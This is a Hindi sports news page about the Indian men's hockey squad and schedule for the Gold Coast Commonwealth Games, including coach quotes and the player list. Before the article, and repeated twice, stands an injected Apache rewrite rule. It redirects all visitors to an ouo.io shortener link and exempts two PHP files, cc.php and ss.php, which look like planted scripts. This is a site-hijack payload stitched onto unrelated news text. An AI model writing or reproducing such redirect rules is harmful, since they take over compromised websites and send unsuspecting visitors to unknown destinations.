
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 359
Previous Nextनई दिल्ली। हॉकी इंडिया (एचआई) ने ऑस्ट्रेलिया के गोल्ड कोस्ट में होने वाले राष्ट्रमंडल खेलों के लिए आज भारतीय पुरुष हॉकी टीम की घोषणा कर दी है। चार अप्रैल से होने वाले इस टूर्नामेंट के लिए भारतीय टीम को पूल-बी में पाकिस्तान, मलेशिया, वेल्स और इंग्लैंड के साथ शामिल किया गया है। कप्तान मनप्रीत सिंह और उप-कप्तान चिंग्लेसाना सिंह कंगुजम के नेतृत्व में भारतीय टीम सात अप्रैल को अपने चिर प्रतिद्वंद्वी पाकिस्तान के खिलाफ टूर्नामेंट का आगाज करेगी। पिछले साल मनप्रीत के ही नेतृत्व में भारतीय टीम ने एशिया कप का खिताब अपने नाम किया था और ओडिशा पुरुष हॉकी वल्र्ड लीग फाइनल में कांस्य पदक जीता था। टीम के मुख्य कोच शुअर्ड मरेन ने कहा, एशिया कप के बाद से आयोजित टूर्नामेंटों में खिलाडिय़ों द्वारा दिए गए प्रदर्शन के आधार पर इस टीम का चयन किया गया है। हमने पिछले टूर्नामेंटों में अलग-अलग टीमों को भेजा और सभी का तालमेल देखा। इसलिए, हमारा मानना है कि यह टीम राष्ट्रमंडल खेलों के लिए सबसे सही है। मरेन ने कहा, इस टीम का लक्ष्य केवल खिताबी जीत है। 27वें सुलतान अजलान शाह कप टूर्नामेंट में हम पदक नहीं जीत पाए, लेकिन इसका कोई भी गलत प्रभाव टीम के ऑस्ट्रेलिया में दिए जाने वाले प्रदर्शन पर नहीं पड़ेगा। हम जीत के मकसद से ही गोल्ड कोस्ट जा रहे हैं।
भारतीय टीम : श्रीजेश परात्तु रवींद्रन, सूरज कारकेरा (गोलकीपर), रुपिंदर पाल सिंह, हरमनप्रीत सिंह, वरुण कुमार, कोथाजीत सिंह कदानगबम, गुरिंदर सिंह, अमित रोहिदास (डिफेंडर), मनप्रीत सिंह (कप्तान), चिंग्लेसाना सिंह कंगुजाम (उप-कप्तान), सुमित, विवेक सागर प्रसाद (मिडफील्डर), आकाशदीप सिंह, सुनील सोमरपेत वित्तलाचार्य, गुरजंत सिंह, मनदीप सिंह, ललित कुमार उपाध्याय, दिलप्रीत सिंह (फॉरवर्ड)।